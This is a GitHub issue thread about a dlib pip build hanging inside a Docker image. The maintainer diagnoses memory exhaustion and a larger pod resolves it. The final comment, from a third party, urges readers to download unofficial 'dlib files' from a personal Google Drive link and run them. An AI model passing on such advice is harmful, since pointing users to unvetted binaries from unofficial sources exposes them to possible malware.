### ISSUE TITLE
Build dlib stucks forever with no error logs

### ISSUE THREAD

**Issue by MrNocTV** [davisking/dlib#2701]
Dlib build gets stuck forever
 

## Expected Behavior

It should at least print out more details why it gets stuck at those lines of code.
Or it should not stuck too long like that.

## Current Behavior

Stucks at these lines 
```
 => [stage-1  9/16] RUN pip install --no-cache-dir dlib -vvv                                                                                                                                                                                           506.9s
 => => #                    from /tmp/pip-install-2d_opbew/dlib_93a3736d4a0d4fcaa59f51c92234fb97/dlib/../dlib/python.h:6,
 => => #                    from /tmp/pip-install-2d_opbew/dlib_93a3736d4a0d4fcaa59f51c92234fb97/tools/python/src/opaque_types.h:6,
 => => #                    from /tmp/pip-install-2d_opbew/dlib_93a3736d4a0d4fcaa59f51c92234fb97/tools/python/src/face_recognition.cpp:4:
 => => #   /usr/local/include/python3.9/ceval.h:130:37: note: declared here
 => => #     130 | Py_DEPRECATED(3.9) PyAPI_FUNC(void) PyEval_InitThreads(void);
 => => #         |
```

## Steps to Reproduce

* **Version**: Latest (since I run `pip install dlib`)
* **Where did you get dlib**: From official source 
* **Platform**: I use `img` to build a Dockerimage, inside the Dockerfile there is a step to install dlib using `pip`
```
FROM python:3.9.14
# Install base packages for Python
RUN pip install --no-cache-dir huggingface_hub flask numpy pandas scipy matplotlib Pillow cython \
    torch torchvision cmake virtualenv ndg-httpsclient ldm h5py datasets
RUN pip install --no-cache-dir dlib -vvv
```
`img` tool: https://github.com/genuinetools/img

**Comment by davisking** [comment]
I can't say.  Maybe you are building on a machine that doesn't have much
RAM, but uses disk swap.  So you are running out of RAM and using ultra
slow swap as a result, making everything take forever.

**Comment by MrNocTV** [comment]
The container has 8CPU and 16GB of RAM, surprisingly it consumes all of those resources.

**Comment by MrNocTV** [comment]
Increasing the pod size fixes the problem, but I wonder is it possible to make the building process more efficient?

**Comment by Suchir2004** [comment]
Download the dlib files
Link - https://drive.google.com/file/d/11Hip8-llWEm5GN3_u4ibI09unL7xCw0g/view?usp=drivesdk
And just copy the path of that file and paste it into the terminal.
Stable version is 10 among all files that you have been downloaded from the link

In terminal you just need copy the path of that particular file; there are 4 files the choose one which is suitable for your computer work on windows.
